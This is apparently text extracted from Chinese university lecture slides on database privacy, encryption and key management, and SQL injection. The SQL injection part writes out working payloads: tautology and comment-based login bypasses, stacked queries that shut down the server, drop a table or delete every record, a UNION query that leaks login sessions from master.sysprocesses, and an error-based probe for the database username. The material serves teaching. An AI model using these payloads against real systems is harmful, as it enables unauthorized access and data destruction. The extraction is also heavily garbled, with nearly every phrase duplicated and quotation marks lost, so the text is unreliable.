第八章數(shù)據(jù)庫隱私

1、1 第八章數(shù)據(jù)庫隱私與數(shù)據(jù)庫安全的其他問題2 3 8 8.1 .1 隱私隱私8 8.1.1 .1.1 隱私權(quán)的產(chǎn)生隱私權(quán)的產(chǎn)生19481948聯(lián)合國大會通過的世界人權(quán)宣言就在聯(lián)合國大會通過的世界人權(quán)宣言就在第第1212條明文規(guī)定：條明文規(guī)定：“任何人的私生活、家庭、任何人的私生活、家庭、住宅和通信不得任意干涉，他的榮譽和名譽不住宅和通信不得任意干涉，他的榮譽和名譽不得加以攻擊。人人有權(quán)享受法律保護，以免受得加以攻擊。人人有權(quán)享受法律保護，以免受干涉或攻擊。干涉或攻擊?！?966”1966年聯(lián)合國大會通過的公年聯(lián)合國大會通過的公民權(quán)利和政治權(quán)利國際公約在第民權(quán)利和政治權(quán)利國際公約在第1717條中

2、作了條中作了幾乎相同的規(guī)定，只是在幾乎相同的規(guī)定，只是在“干涉干涉”的前面加上的前面加上了了“非法非法”字樣，即字樣，即“不得加以任意或非法的不得加以任意或非法的干涉干涉”，使其含義更加確切。，使其含義更加確切。48.1.2 隱私權(quán)的內(nèi)容隱私權(quán)的內(nèi)容 隱私權(quán)隱私權(quán)：是自然人享有的私人生活安寧和私人是自然人享有的私人生活安寧和私人信息依法受保護，不被他人非法侵擾、知悉、信息依法受保護，不被他人非法侵擾、知悉、搜集、利用和公開的一種人格權(quán)，它包含主體搜集、利用和公開的一種人格權(quán)，它包含主體和客體兩部分。和客體兩部分。隱私權(quán)的主體隱私權(quán)的主體：應為自然人，不包括法人。隱應為自然人，不包括法人。隱私權(quán)

3、的宗旨是保持人的心情舒暢、維護人格尊私權(quán)的宗旨是保持人的心情舒暢、維護人格尊嚴。嚴。隱私權(quán)的客體隱私權(quán)的客體：是隱私。是隱私。58.2 隱私形式隱私形式8.2.1 信息時代的隱私信息時代的隱私在網(wǎng)絡所帶來隱私權(quán)問題當中，一個關(guān)鍵的問在網(wǎng)絡所帶來隱私權(quán)問題當中，一個關(guān)鍵的問題就是有關(guān)個人數(shù)據(jù)的權(quán)利問題。題就是有關(guān)個人數(shù)據(jù)的權(quán)利問題。19951995年年7 7月，歐洲聯(lián)盟數(shù)據(jù)保護規(guī)章給個月，歐洲聯(lián)盟數(shù)據(jù)保護規(guī)章給個人數(shù)據(jù)下的定義是：人數(shù)據(jù)下的定義是：“有關(guān)一個人被識別或可有關(guān)一個人被識別或可識別的自然人的任何信息，包括身體的、生理識別的自然人的任何信息，包括身體的、生理的、經(jīng)濟的、文化的、社會的、

4、的、經(jīng)濟的、文化的、社會的、”。由此可見，。由此可見，所謂個人數(shù)據(jù)，是指用來標識個人基本情況的所謂個人數(shù)據(jù)，是指用來標識個人基本情況的一組數(shù)據(jù)資料，其范圍非常廣泛。一組數(shù)據(jù)資料，其范圍非常廣泛。6在網(wǎng)絡上，這些個人數(shù)據(jù)主要包括四個方面。在網(wǎng)絡上，這些個人數(shù)據(jù)主要包括四個方面。v個個人登錄的身份、健康狀況、興趣愛好。人登錄的身份、健康狀況、興趣愛好。v個人的信用和財產(chǎn)狀況，包括信用卡、電個人的信用和財產(chǎn)狀況，包括信用卡、電子消費卡、上網(wǎng)卡、上網(wǎng)賬號和密碼、交子消費卡、上網(wǎng)卡、上網(wǎng)賬號和密碼、交易賬號和密碼等。易賬號和密碼等。v郵箱地址，郵箱地址同樣是個人隱私，用郵箱地址，郵箱地址同樣是個人隱私，

5、用戶大多數(shù)不愿將之公開。戶大多數(shù)不愿將之公開。v網(wǎng)絡活動蹤跡。個人在網(wǎng)上的活動蹤跡。網(wǎng)絡活動蹤跡。個人在網(wǎng)上的活動蹤跡。78.3 數(shù)據(jù)庫隱私數(shù)據(jù)庫隱私8.3 1 數(shù)據(jù)庫隱私保護的原則數(shù)據(jù)庫隱私保護的原則數(shù)據(jù)庫隱私保護的數(shù)據(jù)庫隱私保護的1010條規(guī)則。條規(guī)則。v目標定義目標定義(Purpose Specification)(Purpose Specification)。對收。對收集和存儲在數(shù)據(jù)庫中的每條個人信息都應該集和存儲在數(shù)據(jù)庫中的每條個人信息都應該給出相應的目的描述。給出相應的目的描述。v提供者同意提供者同意(Consent)(Consent)。每條個人信息的相。每條個人信息的相應目的都應

6、該獲得信息提供者的同意。應目的都應該獲得信息提供者的同意。v收集限制收集限制(Limited Collection)(Limited Collection)。個人信息。個人信息的收集應該限制在滿足相應目的的最小需求的收集應該限制在滿足相應目的的最小需求內(nèi)。內(nèi)。v使用限制使用限制(Limited use)(Limited use)。數(shù)據(jù)庫僅僅運行。數(shù)據(jù)庫僅僅運行與收集信息的目的相一致的查詢。與收集信息的目的相一致的查詢。8v泄露限制泄露限制(Limited Disclosure)(Limited Disclosure)。存儲在。存儲在數(shù)據(jù)庫中的數(shù)據(jù)不允許同與信息提供者同數(shù)據(jù)庫中的數(shù)據(jù)不允許同與信

7、息提供者同意目的不符的外界進行交流。意目的不符的外界進行交流。v保留限制保留限制（Limited RetentionLimited Retention）。個人信）。個人信息只在為完成必要目的的時候才加以保留。息只在為完成必要目的的時候才加以保留。v準確準確(Accuracy)(Accuracy)。存儲器在數(shù)據(jù)庫中的個。存儲器在數(shù)據(jù)庫中的個人信息必須是正確的、最新的。人信息必須是正確的、最新的。v安全安全（SafetySafety）。個人信息有安全措施保）。個人信息有安全措施保護，以防被盜或挪作它用。護，以防被盜或挪作它用。v開放開放(Openness)(Openness)。信息擁有者應該能夠訪

8、。信息擁有者應該能夠訪問自己存儲在數(shù)據(jù)庫中的所有信息。問自己存儲在數(shù)據(jù)庫中的所有信息。v遵從遵從（ComplianceCompliance）。信息擁有者能夠驗）。信息擁有者能夠驗證以上規(guī)則的遵守情況，相應地，數(shù)據(jù)庫證以上規(guī)則的遵守情況，相應地，數(shù)據(jù)庫也應該重視對這些規(guī)則的挑戰(zhàn)。也應該重視對這些規(guī)則的挑戰(zhàn)。9 10.3.2 基于訪問控制的隱私保護基于訪問控制的隱私保護 OracleOracle系統(tǒng)的隱私保護系統(tǒng)的隱私保護OracleOracle一直都提供授權(quán)（或拒絕）用戶訪問數(shù)一直都提供授權(quán)（或拒絕）用戶訪問數(shù)據(jù)庫對象的能力，但是這些訪問權(quán)限是在對象據(jù)庫對象的能力，但是這些訪問權(quán)限是在對象級別上

9、定義的，即對于整個表或者整個數(shù)據(jù)庫，級別上定義的，即對于整個表或者整個數(shù)據(jù)庫，而不是針對表中某個特定的行而定義。而不是針對表中某個特定的行而定義。Oracle8iOracle8i中引入的中引入的OracleOracle行級安全性行級安全性(Row-(Row-Level Security, RLS)Level Security, RLS)特性在表的行這一級上特性在表的行這一級上進行控制。行級安全性并不向?qū)Ρ碛腥魏卧L問進行控制。行級安全性并不向?qū)Ρ碛腥魏卧L問權(quán)限的用戶打開整個表，而是將訪問限定到表權(quán)限的用戶打開整個表，而是將訪問限定到表中某個特定的行，其操作結(jié)果就是每個用戶看中某個特定的行，其操作

10、結(jié)果就是每個用戶看到完全不同的數(shù)據(jù)集。到完全不同的數(shù)據(jù)集。10例：例：假設銀行的賬戶經(jīng)理（假設銀行的賬戶經(jīng)理（AMAM）向高資金賬戶）向高資金賬戶持有者提供個人客戶支持。規(guī)定賬戶經(jīng)理只能訪持有者提供個人客戶支持。規(guī)定賬戶經(jīng)理只能訪問管轄之內(nèi)特定的客戶信息，而不是所有客戶信問管轄之內(nèi)特定的客戶信息，而不是所有客戶信息。息。本例有兩個關(guān)鍵表，其一是本例有兩個關(guān)鍵表，其一是CUSTOMERCUSTOMER（客戶）（客戶）表，其二是表，其二是ACCOUNTACCOUNT（賬戶）表（賬戶）表表表8 8.1 CUSTOMER.1 CUSTOMER表表11表表8 8.2 ACCOUNT.2 ACCOUNT表

11、表表表8 8.3 ACCESS_POLICY.3 ACCESS_POLICY表表用戶的安全性經(jīng)理，擁有一個用戶的安全性經(jīng)理，擁有一個Access_policy表，表，可以識別賬戶經(jīng)理和他們各自客戶的賬戶?？梢宰R別賬戶經(jīng)理和他們各自客戶的賬戶。12 表表 8 8.4 ACCESS_POLICY.4 ACCESS_POLICY表記錄表記錄13 10.3.3 數(shù)據(jù)加密數(shù)據(jù)加密數(shù)據(jù)庫安全措施不能抵御的幾種攻擊數(shù)據(jù)庫安全措施不能抵御的幾種攻擊: :v通過非法獲取用戶名和口令，竊取和篡改通過非法獲取用戶名和口令，竊取和篡改數(shù)據(jù)庫中的信息數(shù)據(jù)庫中的信息; ;v用戶繞過操作系統(tǒng)或用戶繞過操作系統(tǒng)或DBMSDB

12、MS的控制入侵系統(tǒng)，的控制入侵系統(tǒng)，竊取和篡改數(shù)據(jù)庫中的信息竊取和篡改數(shù)據(jù)庫中的信息; ; v數(shù)據(jù)存儲介質(zhì)數(shù)據(jù)存儲介質(zhì)( (如磁盤、光盤、磁帶等如磁盤、光盤、磁帶等) )失失竊導致數(shù)據(jù)庫中的數(shù)據(jù)泄漏竊導致數(shù)據(jù)庫中的數(shù)據(jù)泄漏; ; v惡意的數(shù)據(jù)庫管理員惡意的數(shù)據(jù)庫管理員(DBA)(DBA)竊取和篡改數(shù)據(jù)竊取和篡改數(shù)據(jù)庫中的信息。庫中的信息。14數(shù)據(jù)庫加密要求數(shù)據(jù)庫加密要求v數(shù)據(jù)庫中信息保存時間比較長數(shù)據(jù)庫中信息保存時間比較長, ,采用合適的采用合適的加密方式加密方式, ,從根本上達到不可破譯從根本上達到不可破譯; ;v加密后加密后, ,加密數(shù)據(jù)占用的存儲空間不宜明顯加密數(shù)據(jù)占用的存儲空間不宜明顯

13、增大增大; ;v加密加密/ /解密速度要快解密速度要快, ,尤其是解密速度尤其是解密速度, ,要使要使用戶感覺不到加密用戶感覺不到加密/ /解密過程中產(chǎn)生的時延解密過程中產(chǎn)生的時延, ,以及系統(tǒng)性能的變化以及系統(tǒng)性能的變化; ;v授權(quán)機制要盡可能靈活。授權(quán)機制要盡可能靈活。v提供一套安全的、靈活的密鑰管理機制提供一套安全的、靈活的密鑰管理機制; ;v不影響數(shù)據(jù)庫系統(tǒng)的原有功能不影響數(shù)據(jù)庫系統(tǒng)的原有功能, ,保持對數(shù)據(jù)保持對數(shù)據(jù)庫操作庫操作( (如查詢?nèi)绮樵? ,檢索檢索, ,修改修改, ,更新更新) )的靈活性的靈活性和簡便性。和簡便性。15一、加密執(zhí)行層次一、加密執(zhí)行層次操作系統(tǒng)層加密、操作

14、系統(tǒng)層加密、DBMSDBMS內(nèi)核層加密和內(nèi)核層加密和DBMSDBMS外層外層加密三個不同層次實現(xiàn)加密三個不同層次實現(xiàn) 1.1.在操作系統(tǒng)在操作系統(tǒng)(OS)(OS)層執(zhí)行加密層執(zhí)行加密/ /解密：解密：數(shù)據(jù)庫元數(shù)據(jù)庫元素以及各元素之間的關(guān)系無法辨認素以及各元素之間的關(guān)系無法辨認, ,所以無法所以無法產(chǎn)生合理的密鑰。一般在產(chǎn)生合理的密鑰。一般在OSOS層層, ,針對數(shù)據(jù)庫文針對數(shù)據(jù)庫文件要么不加密件要么不加密, ,要么對整個數(shù)據(jù)庫文件進行加要么對整個數(shù)據(jù)庫文件進行加密密, ,加密加密/ /解密不能合理執(zhí)行。因此一般不采用解密不能合理執(zhí)行。因此一般不采用在在OSOS層進行數(shù)據(jù)庫加密。層進行數(shù)據(jù)庫加密

15、。162.2.在在DBMSDBMS內(nèi)核層執(zhí)行加密內(nèi)核層執(zhí)行加密/ /解密解密 在在DBMSDBMS內(nèi)核層對數(shù)據(jù)庫管理系統(tǒng)本身進行內(nèi)核層對數(shù)據(jù)庫管理系統(tǒng)本身進行操作操作, ,這種加密是指數(shù)據(jù)在物理存取之前完成加這種加密是指數(shù)據(jù)在物理存取之前完成加密密/ /解密工作。解密工作。v優(yōu)點：優(yōu)點：是加密功能強是加密功能強, , 不影響不影響DBMSDBMS的功能。的功能。由于與由于與DBMSDBMS系統(tǒng)結(jié)合緊密系統(tǒng)結(jié)合緊密, ,可以提供對各種?？梢蕴峁Ω鞣N粒度加密的靈活性度加密的靈活性, ,靈活的加密配合靈活的加密配合DBMSDBMS的訪問的訪問控制、授權(quán)控制控制、授權(quán)控制 。另外。另外, ,這種層次

16、的加密對這種層次的加密對于應用程序來說是透明的。于應用程序來說是透明的。v缺點：缺點：是加密運算在服務器端進行是加密運算在服務器端進行, DBMS, DBMS除除了完成正常的功能外，還要進行加解密運了完成正常的功能外，還要進行加解密運算，加重了服務器的負載算，加重了服務器的負載, ,而且而且DBMSDBMS和加密器和加密器之間的接口需要之間的接口需要DBMSDBMS開發(fā)商的支持。開發(fā)商的支持。173.3.在在DBMSDBMS外層執(zhí)行加密外層執(zhí)行加密/ /解密解密 在應用程序中實現(xiàn)在應用程序中實現(xiàn), ,加密時調(diào)用應用程序加密時調(diào)用應用程序中的加密模塊來完成數(shù)據(jù)的加密工作中的加密模塊來完成數(shù)據(jù)的加

17、密工作, ,然后把然后把密文數(shù)據(jù)傳送到密文數(shù)據(jù)傳送到DBMSDBMS存儲存儲; ;解密時把密文數(shù)據(jù)解密時把密文數(shù)據(jù)取出到應用程序中取出到應用程序中, ,然后由應用程序中的解密然后由應用程序中的解密模塊將數(shù)據(jù)解密并給出結(jié)果。模塊將數(shù)據(jù)解密并給出結(jié)果。v優(yōu)點：優(yōu)點：不會加重數(shù)據(jù)庫服務器的負載不會加重數(shù)據(jù)庫服務器的負載, , 加解加解密運算可在客戶端進行密運算可在客戶端進行, , 并且可以實現(xiàn)網(wǎng)上并且可以實現(xiàn)網(wǎng)上傳輸?shù)募用軅鬏數(shù)募用? , 可以將加密密鑰與所加密的數(shù)可以將加密密鑰與所加密的數(shù)據(jù)分開保存，提高了安全性。據(jù)分開保存，提高了安全性。v缺點：缺點：加密后的數(shù)據(jù)庫功能受到一些限制，加密后的數(shù)據(jù)

18、庫功能受到一些限制，例如加密后的數(shù)據(jù)無法正常索引。同時數(shù)據(jù)例如加密后的數(shù)據(jù)無法正常索引。同時數(shù)據(jù)加密后也會破壞原有的關(guān)系數(shù)據(jù)的完整性與加密后也會破壞原有的關(guān)系數(shù)據(jù)的完整性與一致性，這些都會給數(shù)據(jù)庫應用帶來影響。一致性，這些都會給數(shù)據(jù)庫應用帶來影響。18二、加密算法的選擇二、加密算法的選擇1.1.對稱加密對稱加密對稱加密算法加密速度快，因此它是最常用的對稱加密算法加密速度快，因此它是最常用的加密技術(shù)。主要的對稱加密算法有加密技術(shù)。主要的對稱加密算法有DESDES、IDEAIDEA和和AESAES。主要缺點密鑰的生成、分發(fā)、備份、。主要缺點密鑰的生成、分發(fā)、備份、重新生成和生命周期等方面常存在安全

19、問題。重新生成和生命周期等方面常存在安全問題。在數(shù)據(jù)庫加密中一般采取對稱密鑰的分組加密在數(shù)據(jù)庫加密中一般采取對稱密鑰的分組加密算法。算法。192. 2. 非對稱加密非對稱加密適用于分布式系統(tǒng)中的數(shù)據(jù)加密。加密速度慢，適用于分布式系統(tǒng)中的數(shù)據(jù)加密。加密速度慢，安全強度沒有對稱加密高，密鑰分發(fā)安全。常安全強度沒有對稱加密高，密鑰分發(fā)安全。常用的公鑰加密算法是用的公鑰加密算法是RSARSA。203.3.混合加密混合加密為了充分發(fā)揮對稱加密與非對稱加密的優(yōu)勢為了充分發(fā)揮對稱加密與非對稱加密的優(yōu)勢, ,混合加密方案被提出。在混合加密方案中混合加密方案被提出。在混合加密方案中, ,加加密者首先利用一個隨機

20、生成的密鑰和對稱加密密者首先利用一個隨機生成的密鑰和對稱加密算法加密數(shù)據(jù)算法加密數(shù)據(jù), ,然后通過使用接收者的公鑰把然后通過使用接收者的公鑰把隨機密鑰進行加密隨機密鑰進行加密, ,并與密文一起傳送給接受并與密文一起傳送給接受者。接收者通過自己的私鑰首先解密隨機密鑰者。接收者通過自己的私鑰首先解密隨機密鑰, ,再利用其解密密文。此方案既利用了對稱加密再利用其解密密文。此方案既利用了對稱加密安全強度高、速度快的特點安全強度高、速度快的特點, ,也利用了非對稱也利用了非對稱加密密鑰管理簡單的特性。加密密鑰管理簡單的特性。21三、數(shù)據(jù)庫加密粒度三、數(shù)據(jù)庫加密粒度一般來說，數(shù)據(jù)庫加密的粒度可以有一般來說

21、，數(shù)據(jù)庫加密的粒度可以有4 4種種v表加密：表加密：表級加密的對象是整個表，這種表級加密的對象是整個表，這種加密方法類似于操作系統(tǒng)中文件加密的方法。加密方法類似于操作系統(tǒng)中文件加密的方法。v屬性加密：屬性加密：屬性加密，以表中的列為單位屬性加密，以表中的列為單位進行加密。進行加密。v記錄加密：記錄加密：記錄加密是把表中的一條記錄記錄加密是把表中的一條記錄作為加密的單位，當數(shù)據(jù)庫中需要加密的記作為加密的單位，當數(shù)據(jù)庫中需要加密的記錄數(shù)比較少時，采用這種方法是比較好的。錄數(shù)比較少時，采用這種方法是比較好的。v數(shù)據(jù)元素加密：數(shù)據(jù)元素加密：數(shù)據(jù)元素加密是以記錄中數(shù)據(jù)元素加密是以記錄中每個字段的值為單位

22、進行加密。每個字段的值為單位進行加密。 22 四、密鑰管理四、密鑰管理對數(shù)據(jù)庫密鑰的管理一般有對數(shù)據(jù)庫密鑰的管理一般有集中密鑰管理集中密鑰管理和多和多級密鑰管理級密鑰管理兩種體制。兩種體制。集中密鑰管理方法是設立密鑰管理中心。在建集中密鑰管理方法是設立密鑰管理中心。在建立數(shù)據(jù)庫時，密鑰管理中心負責產(chǎn)生密鑰并對立數(shù)據(jù)庫時，密鑰管理中心負責產(chǎn)生密鑰并對數(shù)據(jù)加密，形成一張密鑰表。當用戶訪問數(shù)據(jù)數(shù)據(jù)加密，形成一張密鑰表。當用戶訪問數(shù)據(jù)庫時，密鑰管理機構(gòu)核對用戶識別符和用戶密庫時，密鑰管理機構(gòu)核對用戶識別符和用戶密鑰。通過審核后，由密鑰管理機構(gòu)找到或計算鑰。通過審核后，由密鑰管理機構(gòu)找到或計算出相應的數(shù)

23、據(jù)密鑰。這種密鑰管理方式方便用出相應的數(shù)據(jù)密鑰。這種密鑰管理方式方便用戶使用和管理，但由于這些密鑰一般由數(shù)據(jù)庫戶使用和管理，但由于這些密鑰一般由數(shù)據(jù)庫管理人員控制，因而權(quán)限過于集中。管理人員控制，因而權(quán)限過于集中。23目前研究和應用比較多的是多級密鑰管理體制。目前研究和應用比較多的是多級密鑰管理體制。以加密粒度為數(shù)據(jù)元素的三級密鑰管理體制為以加密粒度為數(shù)據(jù)元素的三級密鑰管理體制為例，整個系統(tǒng)的密鑰由一個例，整個系統(tǒng)的密鑰由一個主密鑰主密鑰、每個表上、每個表上的的表密鑰表密鑰，以及各個，以及各個數(shù)據(jù)元素密鑰數(shù)據(jù)元素密鑰組成。表密組成。表密鑰被主密鑰加密后以密文形式保存在數(shù)據(jù)字典鑰被主密鑰加密后以

24、密文形式保存在數(shù)據(jù)字典中，數(shù)據(jù)元素密鑰由主密鑰及數(shù)據(jù)元素所在行、中，數(shù)據(jù)元素密鑰由主密鑰及數(shù)據(jù)元素所在行、列通過某種函數(shù)自動生成，一般不需要保存。列通過某種函數(shù)自動生成，一般不需要保存。在多級密鑰體制中，主密鑰是加密子系統(tǒng)的關(guān)在多級密鑰體制中，主密鑰是加密子系統(tǒng)的關(guān)鍵，系統(tǒng)的安全性在很大程度上依賴于主密鑰鍵，系統(tǒng)的安全性在很大程度上依賴于主密鑰的安全性。的安全性。24例：例：OracleOracle數(shù)據(jù)庫數(shù)據(jù)庫10g10g對列進行加密。對列進行加密。create table accounts(id number not null,firstname varchar2 (20) not null

25、,lastname varchar2 (20) not null,ssn varchar2 (9) ENCRYP USINGAESl28,) SQL Server 2005內(nèi)置密鑰結(jié)構(gòu)內(nèi)置密鑰結(jié)構(gòu) 25數(shù)據(jù)庫加密后對系統(tǒng)的影響數(shù)據(jù)庫加密后對系統(tǒng)的影響v性能下降性能下降v加密的范圍的約束：加密的范圍的約束：如不加密索引字段和表如不加密索引字段和表間的連接碼字段。間的連接碼字段。v加密字符串的模糊匹配加密字符串的模糊匹配: :對加密數(shù)據(jù)上的大對加密數(shù)據(jù)上的大量模糊查詢量模糊查詢, ,例如例如, ,當當SQLSQL條件語句包含條件語句包含“Like”“Like”時時, ,很難進行處理。很難進行處理。

26、v加密數(shù)據(jù)庫的完整性加密數(shù)據(jù)庫的完整性: :當數(shù)據(jù)庫加密后當數(shù)據(jù)庫加密后, ,實體實體完整性不會被破壞完整性不會被破壞, ,而引用完整性難以維護，而引用完整性難以維護，如外鍵約束及值域的定義等。數(shù)據(jù)一旦加密，如外鍵約束及值域的定義等。數(shù)據(jù)一旦加密，DBMSDBMS將難以實現(xiàn)這些約束。將難以實現(xiàn)這些約束。26v使數(shù)據(jù)的使數(shù)據(jù)的SQLSQL語言受到制約：語言受到制約：SQLSQL語言中的語言中的Group byGroup by、Order byOrder by及及HavingHaving子句分別完成子句分別完成分組和排序等操作，解密后的明文數(shù)據(jù)將失分組和排序等操作，解密后的明文數(shù)據(jù)將失去原語句的分

27、組和排序作用。去原語句的分組和排序作用。v密文數(shù)據(jù)容易成為攻擊目標密文數(shù)據(jù)容易成為攻擊目標v加密數(shù)據(jù)的存儲空間增加問題加密數(shù)據(jù)的存儲空間增加問題 v密鑰管理問題密鑰管理問題27加密方法加密方法 例：例：OracleOracle數(shù)據(jù)庫數(shù)據(jù)庫10g10g第二版對列進行加密。第二版對列進行加密。create table accounts(id number not null,firstname varchar2 (20) not null,lastname varchar2 (20) not null,ssn varchar2 (9) ENCRYPT USINGAESl28,)28 10.4 SQL

28、注入攻擊注入攻擊10.4.1 SQL注入攻擊原理注入攻擊原理SQLSQL注入攻擊注入攻擊: :它借助應用程序通過參數(shù)化、動它借助應用程序通過參數(shù)化、動態(tài)態(tài)SQLSQL語句與數(shù)據(jù)庫系統(tǒng)進行交互的內(nèi)部邏輯，語句與數(shù)據(jù)庫系統(tǒng)進行交互的內(nèi)部邏輯，利用程序中存在的漏洞或利用程序中存在的漏洞或BugBug，構(gòu)造與應用程，構(gòu)造與應用程序設計預期不同的序設計預期不同的SQLSQL聲明，非法訪問非授權(quán)聲明，非法訪問非授權(quán)數(shù)據(jù)、篡改數(shù)據(jù)、監(jiān)視隱私、破壞系統(tǒng)。數(shù)據(jù)、篡改數(shù)據(jù)、監(jiān)視隱私、破壞系統(tǒng)。29 一、典型的一、典型的SOLSOL注入攻擊注入攻擊假設某網(wǎng)站的數(shù)據(jù)庫中有一個假設某網(wǎng)站的數(shù)據(jù)庫中有一個usertabl

29、eusertable表用表用來存放用戶的登錄信息，包含來存放用戶的登錄信息，包含username ,username , password password等字段，網(wǎng)站的應用程序根據(jù)用戶提等字段，網(wǎng)站的應用程序根據(jù)用戶提交的數(shù)據(jù)生成交的數(shù)據(jù)生成SQLSQL查詢語句。查詢語句。 開發(fā)人員在數(shù)據(jù)庫中建立一個數(shù)據(jù)庫表開發(fā)人員在數(shù)據(jù)庫中建立一個數(shù)據(jù)庫表user_table 。 CREATE TABLE usertable( Id INTEGER PRIMARYKEY, Username VARCHAR(32), Password VARCHAR(41) );30假如用戶提供的用戶名和口令分別為假如用戶

30、提供的用戶名和口令分別為John和和mypassword，那么檢查用戶，那么檢查用戶ID過程如下所示：過程如下所示： SELECT id FROM usertable WHERE username=John AND password= mypassword；應用程序中生成應用程序中生成SQL查詢語句的代碼：查詢語句的代碼：String querystring=“select * from usertable where ”;if (!username.equals(“”)&(!pass.equals(“”) querystring+=“username=”+username +“ an

31、d password=”+pass+”;else querystring+=“username=guest”;311、用戶、用戶正確輸入正確輸入賬戶名：賬戶名：abc,密碼：密碼：123,則查詢則查詢語句為語句為 select * from usertable where username=abc and password=123;2、 SQL注入攻擊注入攻擊1）若用戶輸入）若用戶輸入賬戶：賬戶：“ OR = 和和密碼：密碼：“ OR = 執(zhí)行的執(zhí)行的SQL語句為：語句為： select * from usertable where username= OR = and password= O

32、R = ; = 恒定成立，恒定成立，32 2）若用戶輸入）若用戶輸入“abc OR 1=1- ”和和 “ ”執(zhí)行的執(zhí)行的SQL語句為：語句為：select * from usertable where username=abc OR 1=1-and password= ; /-以后的內(nèi)容以后的內(nèi)容and password= ; 全部為注冊信全部為注冊信息，息，攻擊后獲取全部信息攻擊后獲取全部信息33 3 3）修改數(shù)據(jù)庫信息）修改數(shù)據(jù)庫信息若用戶輸入若用戶輸入“ ；shutdown with nowait;-shutdown with nowait;-”和和“ ”“ ” 執(zhí)行的執(zhí)行的SQLSQL

33、語句為：語句為： select select * * from usertable where from usertable where username= username= ; ; shutdown with nowaitshutdown with nowait；- and password= and password= ; ; /命令命令shutdown with nowaitshutdown with nowait；會會關(guān)閉數(shù)據(jù)庫關(guān)閉數(shù)據(jù)庫服務器服務器34 若用戶輸入若用戶輸入“;drop table users;-;drop table users;-”和和“ ”“ ”執(zhí)行的執(zhí)行的S

34、QLSQL語句為：語句為： select select * * from usertable where from usertable where username=username= ；drop table usersdrop table users；-and and password=password= ; ; /命令命令drop table usersdrop table users；會會刪刪除除usersusers表表若用戶輸入若用戶輸入“ ；delete from users where delete from users where = = ” 和和 “ “ OR OR = = ”

35、執(zhí)行的執(zhí)行的SQLSQL語句為：語句為： select select * * from usertable where username= from usertable where username= ; ; delete from users where delete from users where = = and and password= password= OR OR = = ; ; /刪除刪除usersusers表中全部記錄表中全部記錄35例例1:某一系統(tǒng)要求考生輸入身份證號碼某一系統(tǒng)要求考生輸入身份證號碼,來查詢各來查詢各門課的考試成績門課的考試成績. SELECT * FROM

36、 score WHERE id=user_id;/ id表示身份證號表示身份證號 如果攻擊者輸入以下內(nèi)容如果攻擊者輸入以下內(nèi)容:“1000 or 1=1”則真正執(zhí)行的語句將如下所示：則真正執(zhí)行的語句將如下所示： SELECT * FROM score WHERE id=1000or1=1;/得到表中所有考生的成績記錄得到表中所有考生的成績記錄.36例例2：假如事先知道該系統(tǒng)的管理員用戶名是：假如事先知道該系統(tǒng)的管理員用戶名是 “admin”,可以在輸入用戶名的文本框中輸入以可以在輸入用戶名的文本框中輸入以下內(nèi)容下內(nèi)容: “admin-”，輸入密碼文本框中輸入，輸入密碼文本框中輸入任意內(nèi)容，假設

37、輸入任意內(nèi)容，假設輸入“ cat22”。 此時執(zhí)行的語句為此時執(zhí)行的語句為: select * from users where username= admin- and password=cat22； /這樣攻擊者就順利地通過了認證這樣攻擊者就順利地通過了認證, 還可以用管還可以用管理員的名義訪問該系統(tǒng)。理員的名義訪問該系統(tǒng)。37二、二、UNIONUNION式式SQLSQL注入攻擊注入攻擊SELECT 語句的語法：語句的語法： SELECT UNION ALL|DISTINCT SELECT ;v UNION將多個將多個SELECT語句的結(jié)果合并為一個集合。語句的結(jié)果合并為一個集合。如果沒有

38、使用關(guān)健字如果沒有使用關(guān)健字ALL，所有返回的結(jié)果是不同的，所有返回的結(jié)果是不同的，等價于使用關(guān)鍵字等價于使用關(guān)鍵字DISTINCT,如果聲明了關(guān)鍵字如果聲明了關(guān)鍵字ALL，返回結(jié)果中包含所有匹配記錄。大部分返回結(jié)果中包含所有匹配記錄。大部分SQL注入攻擊注入攻擊使用使用UNION LL,用以捎回額外的信息。用以捎回額外的信息。38 例：查詢員工信息。例：查詢員工信息。SELECT CustomerID, CompanyName, ContactName FROM Customers WHERE CompanyName =Ernst Handel；攻擊者將攻擊者將“Ernst Handel”，

39、替換如下的內(nèi)容：，替換如下的內(nèi)容：v“Ernst Handel UNION SELECT ALL loginame,hostname,login_time from master.sysprocesses where 1=1-”39表表sysprocesses字段定義字段定義4041 其結(jié)果是這個其結(jié)果是這個SQL語句在服務器端執(zhí)行，將這語句在服務器端執(zhí)行，將這個動態(tài)的個動態(tài)的SQL查詢轉(zhuǎn)換為如下語句：查詢轉(zhuǎn)換為如下語句：SELECT CustomerID, CompanyName, ContactName FROM Customers WHERE CompanyName =Ernst Han

40、del UNION SELECT ALL loginame,hostname,login_time from master.sysprocesses where 1=1-v這是合法的這是合法的SQL語句，返回數(shù)據(jù)庫當前登錄語句，返回數(shù)據(jù)庫當前登錄信息，包括登錄名稱、登錄主機，登錄時間。信息，包括登錄名稱、登錄主機，登錄時間。42三、判斷數(shù)據(jù)庫類型三、判斷數(shù)據(jù)庫類型 例如：網(wǎng)站例如：網(wǎng)站，在網(wǎng)站首頁上，有名為，在網(wǎng)站首頁上，有名為“IE不能打開新窗口的多種解決方法不能打開新窗口的多種解決方法”的鏈接，地址為：的鏈接，地址為：http:/ http:/ showdetail.asp?id=49sh

41、owdetail.asp?id=49, ,服務器返回下面的錯誤提示：服務器返回下面的錯誤提示：Microsoft JET Database Engine Microsoft JET Database Engine 錯誤錯誤 80040e14 80040e14 字符串的語法錯誤字符串的語法錯誤 在查詢表達式在查詢表達式 ID=49 ID=49 中。中。 /showdetail.asp /showdetail.asp，行，行8 8從這個錯誤提示我們能看出下面幾點：從這個錯誤提示我們能看出下面幾點： 1 1）網(wǎng)站使用的是）網(wǎng)站使用的是AccessAccess數(shù)據(jù)庫，通過數(shù)據(jù)庫，通過JETJET引擎連

42、接數(shù)引擎連接數(shù)據(jù)庫，而不是通過據(jù)庫，而不是通過ODBCODBC。 2 2）程序沒有判斷客戶端提交的數(shù)據(jù)是否符合程序要求。）程序沒有判斷客戶端提交的數(shù)據(jù)是否符合程序要求。 3 3）該）該SQLSQL語句所查詢的表中有一名為語句所查詢的表中有一名為IDID的字段。的字段。43獲取數(shù)據(jù)庫的用戶名獲取數(shù)據(jù)庫的用戶名 http:/ and user0； user是是SQL Server的內(nèi)置變量，它的值是當?shù)膬?nèi)置變量，它的值是當前連接的用戶名，類型為前連接的用戶名，類型為nvarchar。拿一個拿一個nvarchar的值跟的值跟int的數(shù)的數(shù)0比較，系統(tǒng)會先試圖將比較，系統(tǒng)會先試圖將nvarchar的值

